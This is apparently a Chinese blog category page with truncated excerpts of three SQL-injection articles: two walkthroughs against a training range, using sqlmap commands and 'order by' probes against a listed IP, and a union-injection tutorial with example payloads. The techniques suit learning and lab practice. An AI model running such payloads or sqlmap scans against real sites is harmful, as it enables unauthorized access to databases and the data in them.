SQL注入
文章平均质量分 63
木尤
广阔天地,大有作为。
展开
-
SQL注入实战(二)
封神台靶场https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb1.打开网站,打开一篇新闻http://59.63.200.79:8004/shownews.asp?id=1712.看下能不能用带参数注入,在后面加个单引号,网页提示传参错误3.现在试试有几个字段测试后发现http://59.63.200.79:8004/shownews.asp?id=171 order by 10order by 10页面显示正常,但是当用orderby原创 2020-07-10 18:08:18 · 338 阅读 · 1 评论 -
SQL注入实战(一)
封神台靶场https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7查找注入点:sqlmap.py -u http://59.63.200.79:8003/?id=1查找数据库sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs有三个数据库available databases [3]:[] information_schema[] maoshe[*] test初步判断是maoshe查找m原创 2020-07-10 18:06:52 · 1086 阅读 · 0 评论 -
SQL注入(一)之union注入
SQL注入(一)之union注入在SQL注入的前期,第一件事情就是找到SQL注入点,在找到注入点后开始下面的内容:一、联合查询法(一)a.判断注入点:and 1=1 --返回true,显示正常and 1=2 --返回false,显示错误b.猜多少列order by [数值]c.联合查询猜表名union select 1,2,3,……,7 from users --猜表名并记录返回回显位(报错说明表不存在,将表名更换继续猜)d.联合查询猜列名union select 1,2,u原创 2020-07-08 14:00:15 · 3029 阅读 · 3 评论